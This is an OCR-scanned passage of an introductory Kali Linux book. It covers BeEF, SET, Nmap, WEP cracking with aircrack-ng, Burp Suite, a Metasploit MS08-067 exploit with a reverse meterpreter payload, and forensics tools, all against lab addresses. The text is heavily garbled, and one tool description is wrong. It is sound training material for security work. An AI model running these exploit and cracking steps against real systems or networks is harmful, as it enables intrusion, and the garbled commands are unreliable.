4 Online Browsers 
44927001 Details Logs Commands Rider XssRays Ipec 
@A8 7001 
4) Offline Browsers 
469127.0.0.1 


@AS8v7001 


Getting Started Logs Current Browser 


> Category: Browser (13 Items) 

Browser Name: Firefox Initialization 
Browser Version: 18 Initialization 
Browser UA Sting: Mozilla’/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox! 18.0 lceweasel! 18.0.1 Initialization 
Browser Plugins: Gnome Shell Integration-v. Initialization 
Window Size: Width: 994, Height: 545 Initialization 
Java Enabled: No Initialization 
VBScript Enabled: No Initialization 
Has Flash: Yes Initialization 
Has GoogleGears: No Initialization 
Has WebSockets: Yes Initialization 
Has ActiveX: No Initialization 
Session Cookies: Yes Initialization 


Persistent Cookies: Yes Initialization 


> Category: Hooked Page (5 Items) 

Page Title: BeEF Basic Demo Initialization 
Page URI: http://127.0.0.1:3000/demos/basic html Initialization 
Page Referrer: http:!/127.0.0.1:3000/uilpanel Initialization 
HosmameAP: 127.0.0.1 Initialization 





These subtabs are as follows: 
° Details: It represents every detail of the browser: its plugins, hooked pages, 
and so on. 
° Logs: It represents the logs of the browser's action. 


° — Commands: This contains different modules that we can execute against the 
browser. 


° — Rider: This tab allows us to submit arbitrary HTTP requests on behalf of the 
hooked browser. 


° — XssRays: This looks for any possibility of XSS attack on the hooked browser. 
We just saw, in short, the basic information of BeEF. You can start playing with BeEF against your 


own web applications, or you can start with the demo lessons added with BeEF to gain more 
knowledge of the framework. 
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Social Engineer Toolkit 


Social Engineer Toolkit (SET) is a popular command-line tool that can frame attack scenarios 
to target specific users. It builds up the scenario based on its custom set options and allows the 
attacker to leverage its power and build the attack vector. The success of the attack vector is 
completely dependent on the human element; hence, it is named as social engineer toolkit. 

To launch SET, navigate to Applications | Kali Linux | Exploitation tools | Social Engineering 
Toolkit | se-toolkit. 


Terminal 


File Edit View Search Terminal Help 


Li- I ay 8 
Homepage : 


JOIN US on Lre.Treenoge.net in chann 


The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: 
select from the menu: 


} Social-Engineering Attacks 

) Fast-Track Penetration Testing 

} Third Party Modules 

) Update the Metasploit Framework 

) Update the Social-Engineer Toolkit 
) Update SET configuration 
) Help, Credits, and About 


IO Whe 


Exit the Social-Engineer Toolkit 





You can select your preferred attack mode from the option's menu to frame the attack. Let us 
select 1. 


Here you will find several attack options to select from. Let us select Spear-Phishing Attack 
Vectors and then select Create Social Engineering Template. This option enables you to build 
your own SET template to launch attacks. 
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Terminal 
k 
File Edit Wiew Search Terminal Help 


= 


Join us .freenode.net in channel #setooLkit 
' Social-Engineer Toolkit is a product of TrustedSec. 
Visit: 
act from the menu: 


Spear-Phishing . Vectors 
Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 
Arduino-Based Attack Vector 
SMS Spoofing . Vector 
Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell . Vectors 
Third Party Modules 


1 
yi] 
3 
A 
a) 
6 
7 
8 
9 


a_i 
eRe €o 


Return back to the main menu. 


a) 
a 


V 
| 





Further, you can also launch website-based attack vectors, java applet attacks, and so on. SET 
is a very useful and friendly tool that can provide variety of options for penetration testing. SET 
also leverages the power of Metasploit Framework to build payloads, meterpreter connections, 
shells, and so on. 


Working with forensics tools 


Kali has an exhaustive collection of free forensic tools that can be used to investigate an infected 
system. Forensics play a completely different role compared to penetration testing. In forensic 
analysis, we try to analyze the root cause of breakthrough whereas, in penetration testing, we 
perform the actual process of breaking. Let us go for a quick ride through some of the important 
forensic tools available in Kali Linux. 
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Autopsy Forensic Browser 
Autopsy is a very useful tool for forensic analysts. It is a GUI-based tool that generates a 
detailed report of events that occurred on an operating system in a timeline fashion. This 
makes it easier to relate one incidence to other. It is a fast and robust tool to investigate 
systems for any malicious behavior. Some of its common features include the following: 

+ Timeline analysis 

+ Filesystem analysis 

+ Extracting history, cookies, and bookmarks from various browsers 

+ Hash filtering 


Autopsy can be launched by navigating to Applications | Kali Linux | Forensics | Digital 
Forensics | Autopsy. 


You can launch the GUI from the browser by locating the localhost :9999/autopsy/ URL. 


} Kali Linux, an Offensive Sec... 9 | f@ Autopsy Forensic Browser % | oe 


& localhost: 9999/autopsy v e@ 


SiMost Visitedy [Offensive Security “A Kali Linux “4 Kali Docs [JExploit-DB W& Aircrack-ng 
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Once the GUI is loaded, you can build a new case by clicking on New Case. A new window, as 
shown in the following screenshot, opens: 


fanted 
Sd 
+d 
i 
sd 





Fill in the initial details such as Case Name, Description, and Investigator Names. At the 
final stage, you will be asked to add an image. Provide the complete path of the image to be 
investigated along with the image type and the import method. Now you are all set to begin 
investigating your target. 


Most of the properties of the image under investigation will be listed in the left-hand side pane 
of the GUI. The Images node reflects the directory structure. The Views node reflects the data 
from a file type. The Results node shows the output from the Ingest modules. The Ingest 
modules analyze multiple files in a prioritized order. This is how you can travel through the 
complete system to figure out the timeline changes in the system and identify any potential 
threat. Autopsy is a very handy tool in cases where the root of infection is not known to us. 
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The Sleuth Kit 


The Sleuth Kit (TSK) is a collection of libraries that can be used to investigate disk images for 
digital forensics. Libraries of The Sleuth Kit can be merged with other forensics tools so that 
they can work in conjunction to perform forensics. Autopsy is a graphical version of The Sleuth 
Kit. Some of the important tools of this kit are as follows: 


+ icat: This tool will display the contents of a file from the image 

+ b1k1s:This tool is used to extract unallocated disk space 

+ fsstat: This tool is used to determine the fragment location of information 
+ £1s:This tool is used to delete files from the image 


These are some useful tools present in this kit that can be used under various situations to 
perform forensic investigations. 


This was an overview of some of the important tools that can be used under various situations 
to perform different tasks ranging from information gathering to forensic investigation. Kali has 
a collection of over 300 tools. Covering all of them is beyond the scope of this book but a good 
understanding of the tools listed in this section can be of great help under any situation. In the 
next section of this book, we will cover some of the tools in a detailed and elaborate manner. 
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Top 5 features you need to know about 


As you start to use Kali Linux, you will realize that there are a wide variety of things that you can 
do with it. This section will teach you all about the most commonly performed tasks and features 
used in Kali. 


Information gathering with Nmap 


Information gathering is the first step towards penetration testing. In this phase, we try and 
collect as much information about our target as possible. Nmap is the most preferred tool for 
scanning and gathering information. Nmap can be launched by opening the console and passing 
the nmap command. This will display a list of different parameters and scopes that can be used 
with Nmap. Let us work with few of them. 


# Toscana single IP, use the following command: 
root@kali:~#nmap 192.168.56.1 


The output of this command is shown in the following screenshot: 


root@kali: ~ 


File Edit View Search Terminal Help 
:~# mmap 192.168.56.1 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-06-27 14:58 EDT 
Nmap scan report for 192.168.56.1 
Host is up (0.0049s latency). 
Not shown: 989 filtered ports 
PORT STATE SERVICE 

open msrpc 

open netbios-ssn 

open microsoft-ds 

open iss-realsecure 

open apex-mesh 

open NFS-or-IIS 

open LSA-or-nterm 

fo) 0]- 10 ee i Be) 

open unknown 

open sbl 
1094/tcp open rootd 


Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds 
ae | 





# Toscanarange of IP addresses in a network, use the following command: 
root@kali:~#nmap 192.168.56.1-255 


+ Toscana particular port number over a target, use the following command: 
root@kali:~#nmap 192.168.56.1 -p 80 


a 


Instant Kali Linux 


# Toscana range of ports over the entire subnet for a specific port range, use the 
following command: 


root@kali:~#nmap 192.168.56.0/24 -p 1-1000 


+ To exclude a specific host or multiple hosts from the scan, use the following command: 


mmap 192.168.56.0/24 --exclude 192.168.1.5 
mmap 192.168.56.0/24 --exclude 192.168.1.5,192.168.1.254 


+ To perform a speedy scan, use the following command: 
nmap -F 192.168.56.1 


+ Toscan the information of the operating system and its version, use the following 
command: 


nmap -A 192.168.56.1 
nmap -v -A 192.168.56.1 


+ To check if a firewall is in place at the target network/IP, use the following command: 
nmap -sA 192.168.1.254 


+ Incase of firewalls, Nmap has a specific parameter to scan the target, which can be 
done using the following command: 


nmap -PN 192.168.1.1 
+ Toincrease the verbosity and see whether all the packets are sent/received, use the 
following command: 


nmap --packet-trace 192.168.1.1 


+ To detect different services running on the remote target, use the following command: 
nmap -sV 192.168.56.1 
+ Toscana target using TCP ACK(PA) or TCP SYN(PS) packets, use the following 
command: 
nmap —-PA 192.168.56.1 


nmap -PS 192.168.56.1 


# To launch a stealthy scan, we will use the TCP SYN scan using the following command: 
nmap -sS 192.168.56.1 


+ To find out various TCP services running on the remote target, we use the TCP connect 
scan using the following command: 


nmap -sT 192.168.56.1 


# ForaUDP scan, we use the following nmap command: 
nmap -sU 192.168.56.1 


——_ 
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+ Allthese scan results can be saved directly to a text file using the following command: 


nmap -sU 192.168.56.1 > scan.txt 


These were some of the important commands that can be handy at the time of information 
gathering and scanning. Nmap provides the feature of linking these different scan parameters 
into a single scan so as to make the process more advanced and sophisticated. 


Breaking wireless passwords using Aircrack 


In this section we will cover details of how to break wireless passwords using Kali Linux. We 
already covered the use of the Fern WIFI cracker in the Fern WIFI Cracker section; we saw that 
this is an automated tool to crack passwords but its scope is limited. Here we will perform each 
step manually to see how Wi-Fi passwords can be cracked. Before we begin, we have to ensure 
that our wireless card supports packet injection. You can search your Wi-Fi hardware on Google 
to see if it supports packet injection. Several USB-based wireless cards are available that can do 
this task. 


Follow these steps to begin cracking Wi-Fi passwords: 


1. Identify the wireless network. 


We will begin by checking our wireless network's interface using the 
iwconfig command. 


root@kali: ~ 


File Edit View Search Terminal Help 

-—f#f Lsusb 
Bus @61 Device 0027: ID @846:96030 NetGear, Inc. WNA11@00 Wireless-N 150 [Atheros A 
RO? /1] 
Bus @0% Devic 
Bus @02 Devic 


ID GeGF:G003 VMware, Inc. Virtual Mouse 
ID GeGF:0002 VMware, Inc. Virtual USB Hub 
1? 
] 


GD sD @ 


Bus @01 Devic ID ld6éb:0002% Linux Foundation 2.0 root hub 

Bus G02 Devic ID ld6b:6061 Linux Foundation 1.1 root hub 
‘-# iwconfig 

wlang TEEE 802.11lbgn ESSID:oaff/any 
Mode:Managed Access Point: Not-Associated Tx-Power=206 dBm 
Retry long Limit:? RUS thr:off Fragment thr:off 
Encryption key:off 


Ga 


Power Management :off 


mo wireless extensions. 
no wireless extensions. 
mo wlreless extensions. 


~# § 
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The wireless card will be listed by default as wlanoO. If the wireless card is not enabled, 
use the following command: 


root@kali:~#Ifconfig wlanO up 


2. Begin scanning. 


To scan the nearby in-range Wi-Fi networks, pass the following command and analyze 
the output: 


root@kali:~#iwlist wlanO scan 


The output will list several details of in-range Wi-Fi networks, such as their ESSID name, 
MAC address, and encryption key status. 


root@kali: ~ 


File Edit View Search Terminal Help 


‘~# iwlist wlan@ scan 

Scan completed 

Cell @1 - Address: AC:F1:DF:F@:99:FD 
Channel :6 
Frequency:2.43/ GHz (Channel 6) 
Quality=24/70 Signal Level=-86 dBm 
Encryption key:on 
ESSID: "DLink" 
Ae a = 1 | | Oe Dee | © a | | 

24 Mb/s; 36 Mb/s; 54 Mb/s 

Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s 
Mode :Master 


Extra: Last beacon: 2216ms ago 
' Unknown: @005444C696E6B 
: Unknown: G1G887848B967430466C 
: Unknown: @30106 
: Unknown: 2AG104 
: Unknown: 2F0104 
- Unknown: 37640C171860 
: Unknown: 


: Unknown: 





You can now select your target from the list and keep a note of its details, such as the 
channel number and MAC address that will be used in later steps. 


3. Setting up the monitoring mode. 


In this step we will configure our wireless card for its monitoring mode. This will enable 
the card to examine all data packets flowing in the air. To do this, we will use airmon- 
ng. It isa command-line tool that sets the wireless cards to the monitoring mode. We 
will pass the following command: 


root@kali:~#airmon-ng start wlan0 


—_ 
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[~# airmon-ng start wlan 


Found 4 processes that could cause trouble. 
If alrodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 


Name 
NetworkManager 


dhclient 
dhclient 
wpa supplicant 


Interface Chipset Driver 


wLlang Atheros ARQ2/1 ath9Sk - [phy@] 
(monitor mode enabled on mon} 





Now, to verify whether the wireless card is active in the monitor mode or not, 
use the ifconfig command. You will notice a new interface with the name 
mono. This is our monitoring interface. 

4. Capturing packets. 


Now we are all set to begin capturing the data packets flowing across our target 
network. We will be using ai rodump-ng for this. The command format will be 
as follows: 


airodump-ng -c (channel) -w (file name) --bssid (bssid) mono 


Once you pass the command along with the respective parameter details, you will 
notice that the wireless card will begin capturing data packets from our target network. 


CH 6 J][ Elapsed: 3 mins ][ 2013-06-30 @0:35 
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 


AC:F1:DF:FQ@:99:FD -85 @ 188 1 Q 6 54e WEP WEP D 


BSSID STATION PWR Rate Lost Frames Probe 





Let it run for a few minutes unless it has captured over 10,000 beacons. 
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5. Cracking the password. 


Once you have closed the packet capture process, you will notice that some new files 
will be created in your root directory. The important file is the * . cap file (crack-01. 
cap) that will be used in cracking the password. Next, we will use aircrack-ng 
along with a dictionary to begin cracking the password. A common dictionary that 
can be used is dark0Ode. 1st; it can be downloaded from 
http://www.filecrop.com/darkcOde.lst.html. 


Once the dictionary is downloaded, you can pass the following command: 


root@kali:~#aircrack-ng crack-0l.cap -w dark0de.lst 


root@kali: ~ 


File Edit View Search Terminal Help 

i“# aircrack-ng crack-@l.cap -w dark@de.1st 
Topen(dictionary) failed: No such file or directory 
fopen(dictionary) failed: No such file or directory 
Opening crack-Ol.cap 
Read 591 packets. 


# BSSID ESSID Encryption 


1 AC:F1:DF:F@:99:FD DLink WEP (26 IVs) 


Choosing first network as target. 


Opening crack-@1.cap 
Attack will be restarted every 5000 captured ivs. 
Starting PTW attack with 26 ivs. 


Aircrack-ng 1.1 


[0:00:03] Tested 983041 keys (got 26 IVs) 


KB depth byte( vote) 





After several minutes, if a dictionary match is found, it will be reflected on the terminal. 
The success of this attack depends on the password strength and the dictionary used 
for the attack. It is always advisable to capture as many packets as possible before 
launching aircrack-ng. 


Web app penetration testing with Burp Suite 


Burp Suite is another popular tool that is widely preferred for auditing web applications. It comes 
in both free and commercial versions with variations in features. Kali Linux comes preinstalled 
with the free version of Burp Suite. It can be launched from Applications | Kali Linux | Web 
Applications | Web Application Fuzzers | Burp Suite. 


a 
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Some of the key features of Burp Suite include the following: 


+ 
+ 
+ 
+ 
+ 


An intercepting proxy that can analyze different requests/responses through the browser 
An application-aware spider to crawl the contents of the application 

Web app scanners for identifying weakness and vulnerability 

Creating and saving the workspace 


Extensibility of the tool by integrating custom plugins 


Burp Suite is a combination of several tools under a single roof that work in conjunction with 
each other. Let us understand some of the common functionalities of Burp Suite. 


Burp proxy 


Burp proxy is an intercepting proxy that reads all the requests/responses sent through a browser. 

It acts as a man-in-the-middle attack vector. To begin working with Burp proxy, we will have to 
change the browser's network settings to bypass the traffic through the proxy. Launch the network 
settings of the browser and give the proxy address as localhost and the port as 8000. 





Connection Settings 


Configure Proxies to Access the Internet 
No proxy 
\) Auto-detect proxy settings for this network 
“) Use system proxy settings 


‘@) Manual proxy configuration: 


HTTP Proxy: | 127.0.0.1 | Port: | 3000 |- 


|| Use this proxy server for all protocols 


SSL Proxy: | Port: | 


ETP Proxy: | Port: 





SOCKS Host: | | Port: | 
socks v4 @ SOCKS v5 
No Proxy for: 


localhost, 12/7.0.0.1 


Example: .mozilla.org, .net.nz, 192.168.1.0/24 


() Automatic proxy configuration URL: 
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Now the browser is all set to communicate through HTTP via Burp proxy. You can view the 
proxy preferences by selecting the Proxy tab and choosing the Options subtab. The intercept 
will reflect any communication captured over HTTP via the browser. The History tab shows 
the timeline of captured communications. 


Burp Suite Free Edition v1.5 
Burp Intruder Repeater Window Help 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Cornparer | Options | Alerts 


Intercept | History | Options 


Proxy Listeners 


Burp Proxy uses listeners to receive incomming HTTP requests fromm your browser. You will need te configure your browser to use one of the listeners as 
its proxy server. 


| Add | Running Interface Invisible Redirect Certificate 


fs eee eer 
Per-host 


| Remove | 


Intercept Client Requests 


Use these settings to control which requests are stalled for viewing and editing in the Intercept tab. 
(#) Intercept requests based on the following rules: 


| Adel | Enabled Operater | Match type Relationship Conditien 
File extension Does not match (* gif$|* pad] * prig$|*css$|~js4]... 
I | Or Request Contains parameters 
Or HTTP rethad Does not match { get] post) 
| Remove | And URL Is in target scope 





You can change your proxy preferences from the Options tab. Let us now discuss the working of 
Burp spider. 


Burp Spider 

Burp Spider is a crawling tool that finds every web page linked to a website. It begins with 
crawling from the home page, or whichever page is given as input, and crawls it by following 
the hyperlinks connected with that page. It finally represents the complete chain in a tree from. 
Burp Spider can be configured from the Options tab. You can select the maximum depth to be 
traversed by the crawler, HTML fields to crawl, application logins, thread count, and so on. 
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Burp Intruder 
Burp Intruder is a powerful tool to automate customized attacks to be launched against the 


web application. It allows the user to build up a template of an attack vector and perform the 
operations in an automated manner. 


Burp Intruder has four important tabs namely Target, Positions, Payloads, and Options. 


Burp Suite Free Edition v1.5 
Burp Intruder Repeater Window Help 
Target | Proxy | Spider | Scanner 


iar 


Target | Positions | Payloads | Options 


(7?) Attack Target 


Configure the details of the target for the attack. 


Hest: | 127.0.0.1 


Port: 80 


|) Use HTTPS 





The Target tab is used for selecting the target address of the application. For local testing, 
itcan beset to 127.0.0.1. 


The Positions tab is used for selecting the positions where the attack template should be applied. 
It can be either a request, form field, parameter, and so on. There are various kinds of attack 
templates, such as sniper attack, battering ram attack, pitchfork attack, and cluster bomb. 


The Payloads tab is used to set the attack vector that needs to be applied at the selected 
positions. For example, an SOL injection attack can be applied by selecting the positions 
as the login form and selecting the payload as the injection strings. 


The Options tab can be used to apply additional settings such as the thread count, retries, 
and storing results. 


This was a quick tutorial covering some of the basic features of Burp Suite. It is highly 
recommended to implement the tool in a practical way against any web application to 
further understand its functioning. 
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Metasploit Exploitation Framework 


Metasploit is a free, open source penetration testing framework started by H. D. Moore in 2003 
and was later acquired by Rapid7. The current stable versions of the framework are written using 
the Ruby language. It has the world's largest database of tested exploits and receives more than 
a million downloads every year. It is also one of the most complex projects built in Ruby to date. 
It comes in both free and commercial license product forms. 


Metasploit is based on a modular architecture, and all its modules and scripts are integrated with 
the framework in the form of modules. This makes it fairly easy to integrate any new custom 
module with the framework and leverage its functionalists. 


Features of Metasploit 
The following are some of the features of Metasploit: 


+ Framework base: Metasploit has a rich base that provides loads of functionalists that 
are required during penetration testing. Some if its base functions include logging, 
configuring, database storage, meterpreter scripting, and so on. 


+ Auxiliary modules: This is one of the major features of Metasploit. Auxiliary modules 
are specific function modules that can perform a variety of tasks both pre and post 
exploitation. Some of its chief functionalities include scanning, information gathering, 
launching specific attacks, OS detection, service detection, and so on. 


+ Packaged tools: Metasploit comes with several handy tools that can further enhance 
the penetration testing experience. These add-on packages can create standalone 
payloads and encrypt the payloads using different algorithms, database connectivity, 
the GUI interface, and so on. 


+ Third-party plugins: Metasploit can integrate with several third-party plugins and use 
its results to build its own attack structure. Results from various tools, such as Nmap, 
Nessus, and NeXpose, can be used directly within the framework. 


+ Open source: The free version of Metasploit is open source, so it can be fully extended 
and modified as needed. 


Metasploit can be launched by navigating to Applications | Kali Linux | Top 10 security tools | 
Metasploit Framework. 


Once the console is loaded, you will notice the msf£> prompt, which indicates that Metasploit 
is now ready to receive your commands. 


To start penetration testing using Metasploit, we need a target system. Let us launch a quick 
Nmap scan to figure out a live system in our network. We will use the following command to 
launch Nmap: 


msf > nmap 192.168.56.1/24 


Mm 
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Nmap scan report for 1927.168.56.1600 

Host is up (@.@0032s latency). 

ALL 1000 scanned ports on 192.158.56.100 are filtered 
MAC Address: @8:00:27:19:37:2B (Cadmus Computer Systems) 


Nmap scan report for 192.168.56.101 
Host is up (0.@0@011s Latency). 
ALL 1000 scanned ports on 192.168.56.101 are closec 


Nmap scan report for 192.168.556.102 

Host is up (@.0012s Latency). 

ALL 1000 scanned ports on 192.168,.56.102 are filtered 
MAC Address: @8:00:27:82:14:25 (Cadmus Computer Systems) 


Nmap done: 256 IP addresses (4 hosts up) scanned in 33.11 seconds 
msf > fj 





In the preceding screenshot, you can see that Nmap has detected four different target systems. 
Let us target a Windows XP system with the IP 192.168.56.102. Now that Nmap has figured 

out that our target system is using the Windows XP operating system, our next target will be 

to identify a remote exploit for Windows XP. Fortunately, we have few stable exploits. Let us 
search for the netapi vulnerability in the Metasploit repository. 


msf > search netapi 


Terminal 


File Edit Wiew Search Terminal Help 

Nmap done: #256 IP addresses (4 hodts up) scanned in 33.11 seconds 
msf > search netapi 

[!] Database not connected or cache not built, using slow search 


Matching Modules 


Disclosure Date Rank Description 
exploit/windows/smb/msO3 049 netapi 2003-11-11 ‘e[elele| Microsoft Works 
tation Service NetAddALternateComputerName Overflow 


al 


expLoit/windows/smb/ms06 640 netapi 2006-08-08 ‘e[elere| Microsoft Serve 
r Service NetpwPathCanonicalize Overflow 

expLoit/windows/smb/ms06 670 wkssvc 2006-11-14 manual Microsoft 
tation Service NetpManagelIPCConnect Overflow 

expLoit/windows/smb/ms08 O67 netapi 2008-10-26 great Microsoft 
r Service Relative Path Stack Corruption 
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Let us select the ms08 067 netapi module of the exploit module, which is ranked as 
great. To activate this module, pass the following command at the console: 


msf > use exploit/windows/smb/ms08 067 netapi 


This will change the console prompt to the exploit module, indicating that your exploit 
module is all set to be executed. 


Now our next step will be to pass the required parameter values to the exploit module. 
The show options command shows the required parameters. 


Here the RHOST value needs to be passed. RHOST is the remote host that we want to target. 
msf exploit(ms08 067 netapi) > set RHOST 192.168.56.102 


Once the exploit modules are set, the next step is to select a PAYLOAD. Let us use the 
meterpreter payload as follows: 


msf exploit(ms08 067 netapi) >set PAYLOAD windows/meterpreter/reverse tcp 


Once the meterpreter payload is selected, we now need to pass the payload parameter values. 
Again, pass the show options command to view the required parameters. Pass on the LHOST 
IP, which is the IP of the attacking machine. 


Now we are all set to launch exploit. Pass on the exploit command to send the exploit 
module to the target machine. 


msf exploit }) > exploit 


[*] Started reverse handler on 192.168,.56.101:4444 
[*] Automatically detecting the target... 
(*] Fingerprint: Windows XP - Service Pack 2 - Lang:English 


[*] Selected Target: Windows XP SP? English (AlwaysOn NX) 
[*] Attempting to trigger the vulnerability... 
*] Sending stage (752128 bytes) to 192.168.56.102 
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1039) at 
2013-07-02 18:19:55 +8000 





If the attack is successful, you will notice that the console prompt changes to meterpreter 
indicating that our payload is successfully executed on the remote machine, and we can now 
control it through our attacking machine. You might have noticed how easily Metasploit was 
able to take over a remote target completely by using exploit modules. Metasploit is a very 
powerful tool to perform penetration testing over remote targets. This was a quick introductory 
tutorial on Metasploit. 


Let us move on to the next section, where we will read about various forensics tools present in 
Kali Linux. 


Mm 
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Network forensics using Kali Linux 


Network forensics involves analyzing, reporting, and recovering network information from a 
computer system or any digital storage media. Forensics involves a detailed investigation of 
events along with gathering relevant information. Kali comes with a wide range of tools that 
can assist in effective forensic analysis. Forensic analysis usually involves investigating different 
aspects, which requires different tools. Unlike exploitation frameworks, forensics usually 
depends on multiple tools. Let us cover some of the major forensic tools in detail here. 


Network analysis with Wireshark 


Wireshark is an open source network packet analyzer tool similar to tcpdump that captures 
the data packets flowing over the wire (network) and presents them in an understandable 
form. Wireshark can be considered as a Swiss army knife as it can be used under different 
circumstances such as network troubleshooting, security operations, and learning protocol 
internals. This is one tool that does it all, and with ease. 


Some of the important benefits of working with Wireshark are as follows: 


+ Multiple protocol support 
+ Auser-friendly interface 
+ Live traffic analysis 

# Opensource 


To begin working with Wireshark in Kali Linux, navigate to Applications | Kali Linux | Top 10 
security tools | Wireshark. 
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Once the GUI is loaded, you will have to select the interface you want to begin working with. 
The left-bottom panel shows the various available interfaces. Select an interface and click on 
Start to begin. You will notice that the GUI starts showing different packets captured on the 
selected interface. 


=} a Gy = & Y**FL BIG oueth #€Vs 
Filter: | | Expression... 








No. Time Source Destination Protocol Length Info 
45 70.071550000 Cadmusco%a9:db:06 RealtekU_12:35:02 42 Who has 10.0.2.2? Tell 10.0.2.15 
46 70.071791000 RealtekU_12:35:02 CadmusCo_89:db:06 60 10.0.2.2 1s at 52:54:00:12:35:02 


| a | LD) 
> Frame 1: 42 bytes on wire (336 bits), 42 bytes captured (336 bits) on interface 0 

> Ethernet II, Src: CadmusCo_89:db:06 (08:00:27:89:db:06), Dst: Broadcast (ff:ff:ff:ff:ff:ff) 

> Address Resolution Protocol (request) 


0000 ff ff ff ff ff ff 08 00 27 89 db O06 O8 O6 OO Ol 
0010 08 00 06 04 OO 01 O8 OO 27 89 db O06 Oa OO O2 OF 
0020 00 00 OO OO OO 00 Oa CO O2 O02 





You will notice that the Wireshark GUI is divided into three distinct sections. The Capture panel 
displays the live capture of packets. The Packet details panel displays information about the 
selected packet in the capture panel. The Packet bytes panel represents the information from 
the Packet details panel ina dump or actual format. It shows the byte sequences of the flow. 
You can select different actions from the menu option to maximize your capture performance. 


Rootkit-scanning forensics with chkrootkit 


Rootkits are malicious programs that are designed to hide malicious processes from detection 
and allow continued, often remote, access to a computer system. Kali Linux provides a special 
rootkit forensics tool called chkrootkit. It can be launched by navigating to Kali Linux | 
Forensics | Digital anti-forensics | chkrootkit. 
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Once the terminal is loaded, change the directory to /usr/sbin and launch chkrootkit. 


r/sbin 
.f/chk rootkit 
ILlLegal number: /-trunk-686-pae 
ROOTDIR is “/' 
Checking “amd'... not found 
Checking “basename'... not infected 
Checking “biff'... not found 
Checking “chfn'... not infected 
Checking “chsh'... not infected 
Checking “cron'... not infected 
Checking “crontab'... not infected 
q ‘“date'... not infected 
gy du'... not infected 
Checking “dirname'... not infected 
Checking “echo'... not infected 
Checking “egrep'... not infected 
Checking “env'... not infected 
Checking “find'... not infected 


altel amare 
Checking 
altel amare 


“fingerd'... alehanaelllate 


“gpm'... 


“grep'... 


not 
not 


Found 
infected 


Checking “hdparm'... not infected 
™ I 


Checking su’... not infected 





Once chkrootkit is launched, it will start scanning the system for any malicious program. 
chkrootkit is a very handy tool to quickly identify any suspicious program installed on 
the system. 


File analysis using mdsdeep 


mdsdeep is an open source tool that is used to compute hashes or message digests for any 
number of files. It can also recurse through the directory structure to generate the signature 
of each and every file inside the directory. Generating MDs signatures of files helps forensics 
analysts in understanding whether the content of the file is changed or not. The MDs of the 
original file is compared with the MDs of the possibly modified file; if a mismatch is found, 

it concludes that the file has been modified. 
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The use of mdsdeep is fairly simple. It can be launched from Applications | Kali Linux | 
Forensics | Forensic Hashing Tools | mds5deep. 


md5deep version 4.2 by Jesse Kornblum and Simson Garfinkel. 
; mMdSdeep [OPTION]... [FILES]... 
See the man page or README.txt file or use -hh for the full List of options 
-p <Slze> - plecewise mode. Files are broken into blocks for hashing 
- recursive mode. ALL Subdirectories are traversed 
- show estimated time remaining for each file 
- Silent mode. Suppress all error messages 
- display file size before hash 
<file> - enables matching mode. See README/man page 
x <file> - enables negative matching mode. See README/man page 
and -X are the same as -m and -x but also print hashes of each file 
- displays which known file generated a match 
- displays known hashes that did not match any input files 
and -A add a single hash to the positive or negative matching set 
prints only the bare name of files; all path information is omitted 
print relative paths for filenames 
print GMT timestamp [(ctime} 
- only process files smaller/Larger than SIZE 
display version number and exit 
output im BFXML; -u - Escape Unicode; -W FILE - write 
<num= - use num threads (default 1} 
- triage mode; -h - help; -Ah - full help 





To generate a list of file signatures for a directory, use the following command: 
root@kali:~#md5deep -r /darklord > darklordmd5.sum 

To match the file integrity, execute the following command: 
root@kali:~#md5deep -rx darklordmd5.sum 


In this way, we can analyze the file integrity to make sure whether any modifications have 
been made or not. 
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People and places you should get to know 


If you need help with Kali Linux, here are some people and places that will prove invaluable. 


Official sites 


The following are official sites that you should visit: 


+ Homepage: http://www.kali.org 
Manual and documentation: http: //docs.kali.org 


Blog: http: //www.kali.org/blog/ 


++ + 


Source code: http: //git.kali.org/gitweb/ 


Articles and tutorials 


The following are articles that you should read to gain more knowledge on Kali Linux: 
+ Backtrack is reborn - Kali: 
www.offensive-security.com/offsec/backtrack-reborn-kali-linux/ 


+ Easily Accessing Wireless network with Kali linux: 
https://community.rapid7.com/community/infosec/blog/2013/05/22/ 


easily-assessing-wireless-networks-with-kali-linux 


+ Kali Linux cracks passwords on an enterprise level: 
http://lifehacker.com/5990375/kali-linux-cracks-passwords-on-the- 


enterprise-level 


+ Installing Vmware tools on Kali Linux: 
http: //www.drchaos.com/installing-vmware-tools-on-kali-linux/ 


Community 
You can reach the Kali Linux community at: 


+ Official mailing list: info@kali.org 

+ Official forums: http: //forums.kali.org 

+ Unofficial forums: http://www. kalilinux.net 
+ 


IRC: irc.freenode.net #kali-linux 
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Blogs 


The following are a few blogs and video tutorials you should read through: 


+ 


Learning security tips through interactive videos by Vivek Ramachandran: 
http://www.securitytube.net 


# Metasploit unleashed, a project by founders of Kali: 
http://www.offensive-security.com/metasploit-unleashed/Main_ Page 
+ Video tutorials on Kali by Cyber arms: 
http://cyberarms.wordpress.com/2013/07/01/video-training-kali-linux- 
assuring-security-by-penetration-testing/ 
# Cyber Attack management with Armitage: http: //www.fastandeasyhacking.com/ 
Twitter 


You can follow: 


+ 


+++ + 


Kali Linux on Twitter: https: //twitter.com/kalilinux 

MalwareMustDie, NPO on Twitter: https: //twitter.com/malwaremustdie 
Follow Devon Kearns on Twitter: https: //twitter.com/dookie2000ca 
Follow Abhinav Singh on Twitter: https: //twitter.com/abhinavbom 


Follow Ken Soona on Twitter: https: //twitter.com/attackvector#shamelessplug 
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About Packt Publishing 


Packt, pronounced ‘packed’, published its first book "Mastering phpMyAdmin for Effective MySOL 
Management" in April 2004 and subsequently continued to specialize in publishing highly focused 
books on specific technologies and solutions. 


Our books and publications share the experiences of your fellow IT professionals in adapting and 
customizing today's systems, applications, and frameworks. Our solution based books give you the 
knowledge and power to customize the software and technologies you're using to get the job done. 
Packt books are more specific and less general than the IT books you have seen in the past. Our 
unique business model allows us to bring you more focused information, giving you more of what 
you need to know, and less of what you don't. 


